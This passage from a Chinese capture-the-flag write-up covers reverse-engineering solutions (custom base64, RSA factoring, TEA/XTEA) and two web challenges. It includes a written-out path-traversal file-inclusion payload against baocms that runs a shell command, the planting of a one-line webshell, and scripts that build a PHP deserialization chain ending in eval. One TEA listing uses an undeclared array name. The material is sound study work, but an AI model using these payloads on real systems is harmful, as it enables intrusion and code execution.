  memset(v26, 0, 0xD1u);
  v12 = 0;
  v21 = 0;
  v22 = 0;
  while ( v12 != 6 )
    *((_BYTE *)&v21 + v12++) ^= '0';
  ++BYTE1(v21);
  ++BYTE1(v22);
  trans(&num_2, &v21);                          // get num_2
  v21 = 0;
  v22 = 0;
  num_3 = BN_POOL_get(ctx);
  BN_mod_exp((int)num_3, (int)input_0, (int)num_2, (int)num_1, (int)ctx);// num_3=input_0^num_2%num_1
  len_ = sub_565A8(num_3);
  v15 = (unsigned __int8 *)malloc((len_ + 7) / 8);
  len_1 = BN_bn2bin((int)num_3, (int)v15);
  sub_525B8(ctx);
  sub_523E8(ctx);
  out = (unsigned __int8 *)calloc(3u, len_1);
  encode(v15, out, len_1, 0);
  free(v15);
  v18 = strcmp(
          "bborOT+ohG*,U:;@/gVIAZ-,t++LaZkOrk?UcSOKJ?p-J+vuSN?:e,Kc/?h-oH?:tthoqYYSPp-ZC+Yw:*jrxPymGYO/PvDOIivNYtvJ?Mi*GG"
          "+/lmqEysrTdSD+eP+moP+l?+Np/oK=",
          (const char *)out);
  free(out);
  (*(void (__fastcall **)(int, int, const char *))(*(_DWORD *)a1 + 680))(a1, a3, input);
  return v18;
}

编译出来检查一下确实是 base64 变种

#include <cstdio>

char st[]="abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ*+,-./:;?@+-";

unsigned int __fastcall div(unsigned int a1, unsigned int a2){
    return a1/a2;
}

int __fastcall encode(unsigned __int8 *in, unsigned __int8 *out, unsigned int len, int a4)
{
  unsigned int v8; // r0
  int v9; // r9
  unsigned int v10; // r6
  int v11; // r8
  int v12; // r4
  unsigned __int8 *v13; // r2
  int v14; // r1
  unsigned __int8 *v15; // r1
  unsigned __int8 v16; // r0
  unsigned __int8 *v17; // r2
  unsigned __int8 v18; // r0
  unsigned int v20; // [sp+0h] [bp-28h]
  int v21; // [sp+4h] [bp-24h]
  unsigned int v22; // [sp+8h] [bp-20h]

  v8 = div(len, 3u);
  v22 = 3 * v8;
  if ( out )
  {
    v20 = len - 3 * v8;
    v21 = a4;
    v9 = 0;
    v10 = 0;
    v11 = 0;
    while ( v10 < v22 )
    {
      printf("(%d/%d)",v10,v22);
      v12 = v9 + 4;
      out[v9] = st[in[v10] >> 2];
      v13 = &out[v9];
      v13[1] = st[(in[v10 + 1] >> 4) & 0xFFFFFFCF | (16 * (in[v10] & 3))];
      v13[2] = st[(in[v10 + 2] >> 6) & 0xFFFFFFC3 | (4 * (in[v10 + 1] & 0xF))];
      v13[3] = st[in[v10 + 2] & 0x3F];
      if ( !v21 || div(v9 + 4 - v11, 76))
      {
        v9 += 4;
      }
      else
      {
        v9 += 5;
        ++v11;
        out[v12] = 10;
      }
      v10 += 3;
    }
    if ( v20 == 2 )
    {
      out[v9] = st[in[v10] >> 2];
      v17 = &out[v9];
      v17[1] = st[(in[v10 + 1] >> 4) & 0xFFFFFFCF | (16 * (in[v10] & 3))];
      v18 = in[v10 + 1];
      v17[3] = 61;
      v17[2] = st[4 * (v18 & 0xF)];
      goto LABEL_17;
    }
    if ( v20 == 1 )
    {
      v15 = &out[v9];
      out[v9] = st[in[v10] >> 2];
      v16 = in[v10];
      v15[2] = 0x3D;
      v15[3] = 0x3D;
      v15[1] = st[16 * (v16 & 3)];
LABEL_17:
      v9 += 4;
      return v9;
    }
  }
  else
  {
    v9 = 4 * v8 + 4;
    if ( len == 3 * v8 )
      v9 = 4 * v8;
    if ( a4 )
      v9 += div(len, 57u);
  }
  return v9;
}
unsigned char in[]={4,19,145,162,221,78,30,13,54,187,174,253,228,107,226,107,61,246,79,93,101,3,50,168,68,175,46,10,202,36,143,195,247,143,85,84,178,127,58,19,105,2,231,193,247,58,31,58,77,49,206,67,44,172,164,253,243,115,92,150,235,66,81,94,150,12,131,42,57,165,87,104,136,133,103,201,53,99,242,98,52,130,13,121,44,196,30,97,36,109,14,199,117,18,157,76,58,157,75,243,89,207,228,233};
char out[100];
int main(){
    int t=encode((unsigned char*)in,(unsigned char*)out,150,0);
    printf("%d\\n",t);
    printf("%s",out);
}

base64变种解密

import base64
import binascii

a="abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ*+,-./:;?@+-="
b="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/="
s="bborOT+ohG*,U:;@/gVIAZ-,t++LaZkOrk?UcSOKJ?p-J+vuSN?:e,Kc/?h-oH?:tthoqYYSPp-ZC+Yw:*jrxPymGYO/PvDOIivNYtvJ?Mi*GG+/lmqEysrTdSD+eP+moP+l?+Np/oK="
c=""
for i in s:
    c=c+b[a.find(i)]
print(c)
q=base64.b64decode(c)
print(binascii.hexlify(q))

RSA分解解密

#include <cstdio>
#include <openssl/bn.h>
#include <openssl/crypto.h>

unsigned char s1[] =
{
  0x0C, 0x0E, 0x0F, 0x0C, 0x79, 0x0F, 0x7B, 0x79, 0x79, 0x79, 
  0x78, 0x05, 0x7F, 0x79, 0x04, 0x79, 0x7B, 0x7B, 0x0E, 0x0A, 
  0x04, 0x7C, 0x7B, 0x7B, 0x0D, 0x0E, 0x0D, 0x79, 0x78, 0x0F, 
  0x0D, 0x08, 0x7F, 0x05, 0x09, 0x0B, 0x78, 0x7F, 0x08, 0x7E, 
  0x78, 0x7E, 0x7E, 0x09, 0x0D, 0x7B, 0x7C, 0x05, 0x7C, 0x7C, 
  0x04, 0x7E, 0x0F, 0x7C, 0x05, 0x08, 0x7E, 0x78, 0x0E, 0x78, 
  0x04, 0x04, 0x0F, 0x0C, 0x04, 0x0E, 0x78, 0x05, 0x0A, 0x0E, 
  0x7F, 0x0F, 0x7F, 0x7E, 0x0B, 0x0B, 0x0A, 0x79, 0x7C, 0x7F, 
  0x78, 0x0F, 0x7C, 0x7E, 0x0E, 0x78, 0x78, 0x04, 0x79, 0x79, 
  0x0F, 0x0E, 0x7F, 0x0E, 0x7C, 0x04, 0x78, 0x79, 0x04, 0x78, 
  0x7E, 0x0D, 0x7E, 0x0E, 0x7E, 0x0A, 0x09, 0x09, 0x08, 0x0B, 
  0x0B, 0x0E, 0x7B, 0x08, 0x09, 0x08, 0x08, 0x09, 0x0B, 0x04, 
  0x7F, 0x0A, 0x0F, 0x0A, 0x79, 0x79, 0x0B, 0x7B, 0x7F, 0x7E, 
  0x0D, 0x0E, 0x7F, 0x0C, 0x7F, 0x7B, 0x04, 0x08, 0x79, 0x0D, 
  0x0E, 0x7C, 0x0C, 0x0E, 0x7E, 0x0D, 0x0E, 0x0B, 0x05, 0x0B, 
  0x09, 0x08, 0x0A, 0x0B, 0x0A, 0x0B, 0x0E, 0x0D, 0x7E, 0x0A, 
  0x78, 0x7C, 0x7F, 0x7B, 0x08, 0x78, 0x0A, 0x7C, 0x7F, 0x08, 
  0x7B, 0x7C, 0x0F, 0x0A, 0x7F, 0x04, 0x09, 0x7C, 0x79, 0x78, 
  0x0A, 0x78, 0x0C, 0x78, 0x0F, 0x0E, 0x7F, 0x7E, 0x7E, 0x0B, 
  0x08, 0x79, 0x0F, 0x7C, 0x0A, 0x79, 0x78, 0x79, 0x0C, 0x7E, 
  0x08, 0x7F, 0x0E, 0x0B, 0x09, 0x7F, 0x08, 0x0C, 0x3D, 
};

int main(){
    BIGNUM *c = BN_new();
    BN_hex2bn(&c,"041391a2dd4e1e0d36bbaefde46be26b3df64f5d650332a844af2e0aca248fc3f78f5554b27f3a136902e7c1f73a1f3a4d31ce432caca4fdf3735c96eb42515e960c832a39a55768888567c93563f26234820d792cc41e61246d0ec775129d4c3a9d4bf359cfe4e9");

    for (int i=0;i<0xD1;i++) s1[i]^=0x3D;
    BIGNUM *n = BN_new();
    printf("s1:%s\\n",s1);
    BN_hex2bn(&n,(const char*)s1);

    char s2[]="010001";
    BIGNUM *e = BN_new();
    BN_hex2bn(&e,(const char*)s2);

    //c=m^e%n
    printf("c:%s\\n",BN_bn2dec(c));
    printf("n:%s\\n",BN_bn2dec(n));
    printf("e:%s\\n",BN_bn2dec(e));

    BIGNUM *p_1 = BN_new();
    BIGNUM *q_1 = BN_new();
    BN_dec2bn(&p_1,"33372027594978156556226010605355114227940760344767554666784520987023841729210037080257448673296881877565718986258036932062710");
    BN_dec2bn(&q_1,"64135289477071580278790190170577389084825014742943447208116859632024532344630238623598752668347708737661925585694639798853366");
    //p=33372027594978156556226010605355114227940760344767554666784520987023841729210037080257448673296881877565718986258036932062711
    //q=64135289477071580278790190170577389084825014742943447208116859632024532344630238623598752668347708737661925585694639798853367
    printf("p:%s\\n",BN_bn2dec(p_1));
    printf("q:%s\\n",BN_bn2dec(q_1));

    BIGNUM *d = BN_new();
    BIGNUM *phi = BN_new();
    BN_CTX *bn_ctx = BN_CTX_new();
    BN_mul(phi,p_1,q_1,bn_ctx);
    BN_mod_inverse(d,e,phi,bn_ctx);
    printf("phi:%s\\n",BN_bn2dec(phi));
    printf("d:%s\\n",BN_bn2dec(d));

    BIGNUM *m = BN_new();
    BN_mod_exp(m,c,d,n,bn_ctx);

    printf("c:%s\\n",BN_bn2hex(c));
    printf("m:%s\\n",BN_bn2hex(m));
}
m:092C636F75222F948E6C6D30F6B8CD61E8896860CEE9A590873B503588892FCB5C2B53228DC5FE4A8D198D4F4077358097B738A6927211296967A45E2F68DF863967D0A6DFC06D2ABB878C1856E9E984CFC78270F8CF6438E17ADCD9823780B860B1835C585CADBE
c:041391A2DD4E1E0D36BBAEFDE46BE26B3DF64F5D650332A844AF2E0ACA248FC3F78F5554B27F3A136902E7C1F73A1F3A4D31CE432CACA4FDF3735C96EB42515E960C832A39A55768888567C93563F26234820D792CC41E61246D0EC775129D4C3A9D4BF359CFE4E9
f:bborOT+ohG*,U:;@/gVIAZ-,t++LaZkOrk?UcSOKJ?p-J+vuSN?:e,Kc/?h-oH?:tthoqYYSPp-ZC+Yw:*jrxPymGYO/PvDOIivNYtvJ?Mi*GG+/lmqEysrTdSD+eP+moP+l?+Np/oK=

上调试机动态调了好多次，算法肯定没问题

直接patch传入明文m进去加密一路right

可能是有反调试？或者脑洞？

abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ*+,-./:;?@+-

常量表里±出现了两次，还要枚举一层

解题脚本

import base64
import binascii

#a="abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ*+,-./:;?@+-="
a="abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ*+,-./:;?@$#="
b="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/="
s="bborOT+ohG*,U:;@/gVIAZ-,t++LaZkOrk?UcSOKJ?p-J+vuSN?:e,Kc/?h-oH?:tthoqYYSPp-ZC+Yw:*jrxPymGYO/PvDOIivNYtvJ?Mi*GG+/lmqEysrTdSD+eP+moP+l?+Np/oK="

n=2140324650240744961264423072839333563008614715144755017797754920881418023447140136643345519095804679610992851872470914587687396261921557363047454770520805119056493106687691590019759405693457452230589325976697471681738069364894699871578494975937497937
d=1219002363472329316632678572665837077877528004905520939230037996503041169769564562618818603930146413036298872224725717654149810234132887053185714832075764978825457518728410705223332728199047961645304133836997233492855592278022423674340390891560261753
e=65537

def test(c):
    c=c.translate(str.maketrans(a,b))
    c=base64.b64decode(c)
    c=int.from_bytes(c,byteorder='big',signed=False)
    m=pow(c,d,n)
    mx=hex(m)
    if (len(mx)<200):
        print(mx)
        m=m.to_bytes(length=0x68,byteorder='big',signed=False)
        print(m)
        input()

l=[]
for index,i in enumerate(s):
    if i in '+-':
        l.append(index)

p=list(s)
tr={"+":"$","-":"#"}

def enum(dep,ch):
    if (ch):
        p[l[dep]]=tr[s[l[dep]]]
    else:
        p[l[dep]]=s[l[dep]]
    if (dep==0):
        print(''.join(p))
        test(''.join(p))
    else:
        enum(dep-1,0)
        enum(dep-1,1)

enum(len(l)-1,0)
enum(len(l)-1,1)

LongTimeAgo

#include "stdio.h"
#include "stdint.h"

//0x8F3779E9
void xtea_decrypt(uint32_t v[2], uint32_t const key[4]) {  
    unsigned int i;  
	unsigned int num_rounds = 32;
    uint32_t v0=v[0], v1=v[1], delta=0x8F3779E9, sum=delta*num_rounds;  
    for (i=0; i < num_rounds; i++) {
        v1 -= (((v0 << 4) ^ (v0 >> 5)) + v0) ^ (sum + key[(sum>>11) & 3]);  
        sum -= delta;  
        v0 -= (((v1 << 4) ^ (v1 >> 5)) + v1) ^ (sum + key[sum & 3]);  
    }  
    v[0]=v0; v[1]=v1;
}

//0x3D3529BC
void tea_decrypt (uint32_t* v, uint32_t* k) {  
    uint32_t v0=v[0], v1=v[1], sum, i;  /* set up */  
    uint32_t delta=0x3D3529BC;                     /* a key schedule constant */  
	sum = delta * 32;
    uint32_t k0=k[0], k1=k[1], k2=k[2], k3=k[3];   /* cache key */  
    for (i=0; i<32; i++) {                         /* basic cycle start */  
        v1 -= ((v0<<4) + k2) ^ (v0 + sum) ^ ((v0>>5) + k3);  
        v0 -= ((v1<<4) + k0) ^ (v1 + sum) ^ ((v1>>5) + k1);  
        sum -= delta;  
    }                                              /* end cycle */  
    v[0]=v0; v[1]=v1;
}

unsigned int cher[8] = {
    0x1F306772, 0xB75B0C29, 0x4A7CDBE3, 0x2877BDDF, 0x1354C485, 0x357C3C3A, 0x738AF06C, 0x89B7F537
};
unsigned int key[4] = {
	0xFFFD, 0x1FFFD, 0x3FFFD, 0x7FFFD
};

int main(){
	unsigned v[2];

	v[0] = cipher[0] ^ 0xfd;
	v[1] = cipher[1] ^ 0x1fd;
	xtea_decrypt(v, key);
	printf("%08x%08x", v[0], v[1]);

	v[0] = cipher[2] ^ 0xfd;
	v[1] = cipher[3] ^ 0x1fd;
	xtea_decrypt(v, key);
	printf("%08x%08x", v[0], v[1]);

	v[0] = cipher[4] ^ 0x3fd;
	v[1] = cipher[5] ^ 0x7fd;
	tea_decrypt(v, key);
	printf("%08x%08x", v[0], v[1]);

	v[0] = cipher[6] ^ 0x3fd;
	v[1] = cipher[7] ^ 0x7fd;
	tea_decrypt(v, key);
	printf("%08x%08x", v[0], v[1]);
}

Web

Hard_Penetration

用🐲👴的工具https://github.com/ccdr4gon/Dr4gonSword

真的很牛 直接注入内存🐎

连接到shell 扫内网端口 有8005

frp挂上代理访问是baocms

代码https://github.com/IsCrazyCat/demo-baocms-v17.1

漫长的代码审计后

在Tudou/Lib/barcodegen/html/image.php处找到文件包含漏洞

<?php
if(isset($_GET['code'], $_GET['t'], $_GET['r'], $_GET['rot'], $_GET['text'], $_GET['f1'], $_GET['f2'], $_GET['o'], $_GET['dpi'], $_GET['a1'], $_GET['a2'])) {
	require('config.php');
	require($class_dir . '/BCGColor.php');
	require($class_dir . '/BCGBarcode.php');
	require($class_dir . '/BCGDrawing.php');
	require($class_dir . '/BCGFont.php');
	if(include($class_dir . '/BCG' . $_GET['code'] . '.barcode.php')) {
		if($_GET['f1'] !== '0' && $_GET['f1'] !== '-1' && intval($_GET['f2']) >= 1) {
			$font = new BCGFont($class_dir . '/font/' . $_GET['f1'], intval($_GET['f2']));
		} else {
			$font = 0;
		}
		$color_black = new BCGColor(0, 0, 0);
		$color_white = new BCGColor(255, 255, 255);
		$codebar = 'BCG' . $_GET['code'];
		$code_generated = new $codebar();
		if(isset($_GET['a1']) && intval($_GET['a1']) === 1) {
			$code_generated->setChecksum(true);
		}
.......

利用：

由于.barcode.php文件名被写死了，但是code是可控的，所以可以构造成…/…/…/…/…/…/tmp/.barcode.php进行目录穿越包含.barcode.php文件，在/tmp目录下创建.barcode.php文件写入一句话🐎

然后构造利用即可

payload:

127.0.0.1:8005/Tudou/Lib/barcodegen/html/image.php?code=/../../.
./../../../../../../../tmp/&t=1&r=1&rot=1&text=1&f1=1&f2=1&o=1&dpi=1&a1=1&a2=1&neo=system('cat /flag');

pop_master

一万个类找 POP 链

解析 AST 找到可以用的类（即输入不会被完全替换）

https://github.com/nikic/PHP-Parser

ast.php

<?php
use PhpParser\\ParserFactory;
use PhpParser\\Node;
use PhpParser\\NodeVisitorAbstract;
use PhpParser\\NodeTraverser;

require './vendor/autoload.php';

$code = file_get_contents('./class.php');

$parser = (new ParserFactory)->create(ParserFactory::PREFER_PHP7);

try {
    $ast = $parser->parse($code);
} catch (Error $error) {
    echo "Parse error: {$error->getMessage()}\\n";
    return;
}

function filter(Node\\Stmt $stmt, Node\\Stmt\\ClassMethod $method): bool {
    if ($stmt instanceof Node\\Stmt\\Expression &&
        $stmt->expr instanceof Node\\Expr\\Assign &&
        $stmt->expr->var instanceof Node\\Expr\\Variable &&
        $stmt->expr->var->name == $method->params[0]->var->name) {
        return false;
    } else if ($stmt instanceof Node\\Stmt\\For_ &&
        $stmt->stmts[0] instanceof Node\\Stmt\\Expression &&
        $stmt->stmts[0]->expr instanceof Node\\Expr\\Assign &&
        $stmt->stmts[0]->expr->var instanceof Node\\Expr\\Variable &&
        $stmt->stmts[0]->expr->var->name == $method->params[0]->var->name) {
        return false;
    } else {
        return true;
    }
}

$classes = array();
$methods = array();
$calleds = array();
$available = array();

$traverser = new NodeTraverser();
$traverser->addVisitor(new class extends NodeVisitorAbstract {
    public function enterNode(Node $node) {
        global $classes, $methods, $calleds, $available;
        if ($node instanceof Node\\Stmt\\Class_) {
            foreach ($node->getMethods() as $method) {
                foreach ($method->stmts as $key => $stmt) {
                    if ($stmt instanceof Node\\Stmt\\Expression) {
                        if ($stmt->expr instanceof Node\\Expr\\MethodCall) {
                            array_push($classes, $node->name->toString());
                            array_push($methods, $method->name->toString());
                            array_push($calleds, $stmt->expr->name->toString());
                            if ($key > 0) {
                                array_push($available, filter($method->stmts[$key - 1], $method));
                            } else {
                                array_push($available, true);
                            }
                        } else if ($stmt->expr instanceof Node\\Expr\\Eval_) {
                            array_push($classes, $node->name->toString());
                            array_push($methods, $method->name->toString());
                            array_push($calleds, 'eval');
                            if ($key > 0) {
                                array_push($available, filter($method->stmts[$key - 1], $method));
                            } else {
                                array_push($available, true);
                            }
                        }
                    } else if ($stmt instanceof Node\\Stmt\\If_) {
                        if ($stmt->stmts[0] instanceof Node\\Stmt\\Expression && $stmt->stmts[0]->expr instanceof Node\\Expr\\MethodCall) {
                            array_push($classes, $node->name->toString());
                            array_push($methods, $method->name->toString());
                            array_push($calleds, $stmt->stmts[0]->expr->name->toString());
                            if ($key == 1) {
                                array_push($available, filter($method->stmts[$key - 1], $method));
                            } else if ($key == 2) {
                                array_push($available, filter($method->stmts[$key - 2], $method));
                            } else {
                                array_push($available, true);
                            }
                        }
                    }
                }
            }
        }
    }
});
$ast = $traverser->traverse($ast);

构造二叉树找可用链

find.php

<?php
require 'ast.php';

class FindNode {
    public string $class;
    public string $method;
    public bool $available;

    public FindNode $left;
    public FindNode $right;
    public ?FindNode $parent = null;

    public function __construct(string $class, string $method, bool $available) {
        $this->class = $class;
        $this->method = $method;
        $this->available = $available;
    }
}

$eval = array();

function find(FindNode $node) {
    global $eval;
    global $classes, $methods, $calleds, $available;

    if ($node->available) {
        $keys = array_keys($methods, $node->method);
        $called = $calleds[$keys[0]];
        if ($called == 'eval') {
            if ($available[$keys[0]]) {
                array_push($eval, $node);
            }
        } else {
            $called_key = array_search($called, $methods);
            $node->left = new FindNode($classes[$called_key], $called, $available[$called_key]);
            $node->left->parent = $node;
            find($node->left);
        }

        if (count($keys) == 2) {
            $called = $calleds[$keys[1]];
            if ($called == 'eval') {
                if ($available[$keys[1]]) {
                    array_push($eval, $node);
                }
            } else {
                $called_key = array_search($called, $methods);
                $node->right = new FindNode($classes[$called_key], $called, $available[$called_key]);
                $node->right->parent = $node;
                find($node->right);
            }
        }
    }
}

global $classes, $methods;
$root = new FindNode('', 'BSatHY', true);
$root_key = array_search($root->method, $methods);
$root->class = $classes[$root_key];
find($root);

$last = $eval[0];
$success_classes = array();
$success_methods = array();

while ($last) {
    array_push($success_classes, $last->class);
    array_push($success_methods, $last->method);
    $last = $last->parent;
}

$success_classes = array_reverse($success_classes);
$success_methods = array_reverse($success_methods);

再把链上的类导出来手写序列化

pop.php

<?php
require 'find.php';

use PhpParser\\ParserFactory;
use PhpParser\\Node;
use PhpParser\\NodeFinder;
use PhpParser\\PrettyPrinter;

require './vendor/autoload.php';

$code = file_get_contents('./class.php');

$parser = (new ParserFactory)->create(ParserFactory::PREFER_PHP7);

try {
    $ast = $parser->parse($code);
} catch (Error $error) {
    echo "Parse error: {$error->getMessage()}\\n";
    return;
}

$nodeFinder = new NodeFinder();
$result = array();

global $success_classes, $success_methods;
foreach ($success_classes as $key => $name) {
    echo $name . " " . $success_methods[$key] . "\\n";
    $class = $nodeFinder->findFirst($ast, function(Node $node) use ($name) {
        return $node instanceof Node\\Stmt\\Class_
            && $node->name->toString() === $name;
    });
    if ($class && $class instanceof Node\\Stmt\\Class_) {
        foreach ($class->stmts as $stmt_key => $stmt) {
            if ($stmt instanceof Node\\Stmt\\ClassMethod && !in_array($stmt->name->toString(), $success_methods)) {
                array_splice($class->stmts, $stmt_key, 1);
            }
        }
        array_push($result, $class);
    }
}

$prettyPrinter = new PrettyPrinter\\Standard;
file_put_contents("test.php", $prettyPrinter->prettyPrintFile($result) . "\\n");

test.php

<?php

class HdeuDP
{
    public $ErltTLc;
    public function BSatHY($kECoG)
    {
        $this->qSvVG = "EOqvO";
        if (method_exists($this->ErltTLc, 'GGWZSI')) {
            $this->ErltTLc->GGWZSI($kECoG);
        }
        if (method_exists($this->ErltTLc, 'mymqzK')) {
            $this->ErltTLc->mymqzK($kECoG);
        }
    }
}
class vwR9vW
{
    public $sQ9iP8M;
    public function GGWZSI($sxXmz)
    {
        for ($i = 0; $i < 24; $i++) {
            $aMHmsA = $sxXmz;
        }
        if (method_exists($this->sQ9iP8M, 'Ez1w4x')) {
            $this->sQ9iP8M->Ez1w4x($sxXmz);
        }
        if (method_exists($this->sQ9iP8M, 'XstiKs')) {
            $this->sQ9iP8M->XstiKs($sxXmz);
        }
    }
}
class sg2RxY
{
    public $qsDrtNG;
    public function Ez1w4x($BoGtf)
    {
        if (11792 > 19530) {
            $BoGtf = $BoGtf . 'WznaW';
        }
        $this->qsDrtNG->xOBpW0($BoGtf);
    }
}
class M4LuGl
{
    public $VGhzS66;
    public function xOBpW0($mcFiQ)
    {
        $this->BO10G = "NU4C7";
        if (method_exists($this->VGhzS66, 'yTEURN')) {
            $this->VGhzS66->yTEURN($mcFiQ);
        }
        if (method_exists($this->VGhzS66, 'cniDX8')) {
            $this->VGhzS66->cniDX8($mcFiQ);
        }
    }
}
class rHZfcN
{
    public $tgW2UXg;
    public function yTEURN($WSoPF)
    {
        $this->YXdVB = "MVTKA";
        if (method_exists($this->tgW2UXg, 'y02y08')) {
            $this->tgW2UXg->y02y08($WSoPF);
        }
        if (method_exists($this->tgW2UXg, 'qVbCki')) {
            $this->tgW2UXg->qVbCki($WSoPF);
        }
    }
}
class gxx6av
{
    public $c1WX5it;
    public function y02y08($fX0aQ)
    {
        $this->eK6np = "kN0IB";
        $this->c1WX5it->r6LtQG($fX0aQ);
    }
}
class L0UPus
{
    public $qZfI0OC;
    public function r6LtQG($BFESf)
    {
        $this->rg5UW = "zos3T";
        if (method_exists($this->qZfI0OC, 'QF8XY1')) {
            $this->qZfI0OC->QF8XY1($BFESf);
        }
        if (method_exists($this->qZfI0OC, 'LuSdbh')) {
            $this->qZfI0OC->LuSdbh($BFESf);
        }
    }
}
class K7VNu5
{
    public $lB9b5G5;
    public function QF8XY1($AGE10)
    {
        for ($i = 0; $i < 9; $i++) {
            $ayzdYg = $AGE10;
        }
        if (method_exists($this->lB9b5G5, 'zD7lbq')) {
            $this->lB9b5G5->zD7lbq($AGE10);
        }
        if (method_exists($this->lB9b5G5, 'IpkWxX')) {
            $this->lB9b5G5->IpkWxX($AGE10);
        }
    }
}
class T5mH7X
{
    public $xCsxdh5;
    public function IpkWxX($PEvGe)
    {
        $this->voWr3 = "Nz8vn";
        if (method_exists($this->xCsxdh5, 'EKr4ag')) {
            $this->xCsxdh5->EKr4ag($PEvGe);
        }
        if (method_exists($this->xCsxdh5, 't4SIVr')) {
            $this->xCsxdh5->t4SIVr($PEvGe);
        }
    }
}
class lwmggy
{
    public $FigpmfG;
    public function EKr4ag($gKFKp)
    {
        $this->Tiwg9 = "IRavG";
        $this->FigpmfG->lhtmWT($gKFKp);
    }
}
class X1Bmbb
{
    public $u0ma7My;
    public function lhtmWT($ezg5D)
    {
        for ($i = 0; $i < 16; $i++) {
            $aQI2GP = $ezg5D;
        }
        if (method_exists($this->u0ma7My, 's7F8zs')) {
            $this->u0ma7My->s7F8zs($ezg5D);
        }
        if (method_exists($this->u0ma7My, 'nhN1A7')) {
            $this->u0ma7My->nhN1A7($ezg5D);
        }
    }
}
class sNyaIR
{
    public $vfg35pV;
    public function s7F8zs($aK86k)
    {
        for ($i = 0; $i < 39; $i++) {
            $aFU8Tr = $aK86k;
        }
        if (method_exists($this->vfg35pV, 'WfmYgs')) {
            $this->vfg35pV->WfmYgs($aK86k);
        }
        if (method_exists($this->vfg35pV, 'DZP5my')) {
            $this->vfg35pV->DZP5my($aK86k);
        }
    }
}
class L4F0o0
{
    public $aa1YDXx;
    public function DZP5my($cRuqt)
    {
        if (7225 > 51042) {
            $cRuqt = $cRuqt . 'LPfyp';
        }
        if (method_exists($this->aa1YDXx, 'sFvdtP')) {
            $this->aa1YDXx->sFvdtP($cRuqt);
        }
        if (method_exists($this->aa1YDXx, 'mG4Y4e')) {
            $this->aa1YDXx->mG4Y4e($cRuqt);
        }
    }
}
class zrVAgB
{
    public $lZCvTCa;
    public function mG4Y4e($pGHYR)
    {
        for ($i = 0; $i < 5; $i++) {
            $aBwmWS = $pGHYR;
        }
        $this->lZCvTCa->ruF6g1($pGHYR);
    }
}
class DcdRXA
{
    public $cO81cFh;
    public function ruF6g1($NdPP4)
    {
        $this->wqFxW = "TdA1L";
        $this->cO81cFh->DOqAB2($NdPP4);
    }
}
class R9VkbV
{
    public $VqvWTUF;
    public function DOqAB2($FtEHV)
    {
        for ($i = 0; $i < 24; $i++) {
            $ad1M6I = $FtEHV;
        }
        $this->VqvWTUF->dgzpEV($FtEHV);
    }
}
class m2oL58
{
    public $cgQkf6v;
    public function dgzpEV($XSe7m)
    {
        if (20744 > 30587) {
            $XSe7m = $XSe7m . 'ATBgs';
        }
        if (method_exists($this->cgQkf6v, 'x62I2C')) {
            $this->cgQkf6v->x62I2C($XSe7m);
        }
        if (method_exists($this->cgQkf6v, 'K8gDPQ')) {
            $this->cgQkf6v->K8gDPQ($XSe7m);
        }
    }
}
class CIecTW
{
    public $FS7bzT6;
    public function x62I2C($M1qEC)
    {
        $this->vLssi = "K9Muh";
        if (method_exists($this->FS7bzT6, 'yXQG7A')) {
            $this->FS7bzT6->yXQG7A($M1qEC);
        }
        if (method_exists($this->FS7bzT6, 'yRo7eg')) {
            $this->FS7bzT6->yRo7eg($M1qEC);
        }
    }
}
class bSaDnb
{
    public $uklXnxo;
    public function yXQG7A($GWO3a)
    {
        if (51752 > 21391) {
            $GWO3a = $GWO3a . 'cpuNP';
        }
        $this->uklXnxo->kuHG2i($GWO3a);
    }
}
class PTCzfW
{
    public $ybeKnmY;
    public function kuHG2i($nW6E9)
    {
        if (37307 > 17647) {
            $nW6E9 = $nW6E9 . 'RlYLu';
        }
        if (method_exists($this->ybeKnmY, 'VT42cE')) {
            $this->ybeKnmY->VT42cE($nW6E9);
        }
        if (method_exists($this->ybeKnmY, 'dBbWYC')) {
            $this->ybeKnmY->dBbWYC($nW6E9);
        }
    }
}
class DEGn5X
{
    public $tpdAnk7;
    public function VT42cE($PnvsO)
    {
        $this->FKGiG = "hg0tc";
        if (method_exists($this->tpdAnk7, 'aAoOwi')) {
            $this->tpdAnk7->aAoOwi($PnvsO);
        }
        if (method_exists($this->tpdAnk7, 'EtmH03')) {
            $this->tpdAnk7->EtmH03($PnvsO);
        }
    }
}
class vzURHs
{
    public $t43nVRQ;
    public function aAoOwi($Pe6pd)
    {
        for ($i = 0; $i < 1; $i++) {
            $aQBlnL = $Pe6pd;
        }
        if (method_exists($this->t43nVRQ, 'Lgtm7z')) {
            $this->t43nVRQ->Lgtm7z($Pe6pd);
        }
        if (method_exists($this->t43nVRQ, 'vHOZvc')) {
            $this->t43nVRQ->vHOZvc($Pe6pd);
        }
    }
}
class y93b0L
{
    public $vv0iwPE;
    public function Lgtm7z($qoKDy)
    {
        if (58621 > 27135) {
            $qoKDy = $qoKDy . 'oDbtW';
        }
        eval($qoKDy);
    }
}

$test = new HdeuDP();
$test->ErltTLc = new vwR9vW();
$test->ErltTLc->sQ9iP8M = new sg2RxY();
$test->ErltTLc->sQ9iP8M->qsDrtNG = new M4LuGl();
$test->ErltTLc->sQ9iP8M->qsDrtNG->VGhzS66 = new rHZfcN();
$test->ErltTLc->sQ9iP8M->qsDrtNG->VGhzS66->tgW2UXg = new gxx6av();
$test->ErltTLc->sQ9iP8M->qsDrtNG->VGhzS66->tgW2UXg->c1WX5it = new L0UPus();
$test->ErltTLc->sQ9iP8M->qsDrtNG->VGhzS66->tgW2UXg->c1WX5it->qZfI0OC = new K7VNu5();
$test->ErltTLc->sQ9iP8M->qsDrtNG->VGhzS66->tgW2UXg->c1WX5it->qZfI0OC->lB9b5G5 = new T5mH7X();
$test->ErltTLc->sQ9iP8M->qsDrtNG->VGhzS66->tgW2UXg->c1WX5it->qZfI0OC->lB9b5G5->xCsxdh5 = new lwmggy();
$test->ErltTLc->sQ9iP8M->qsDrtNG->VGhzS66->tgW2UXg->c1WX5it->qZfI0OC->lB9b5G5->xCsxdh5->FigpmfG = new X1Bmbb();
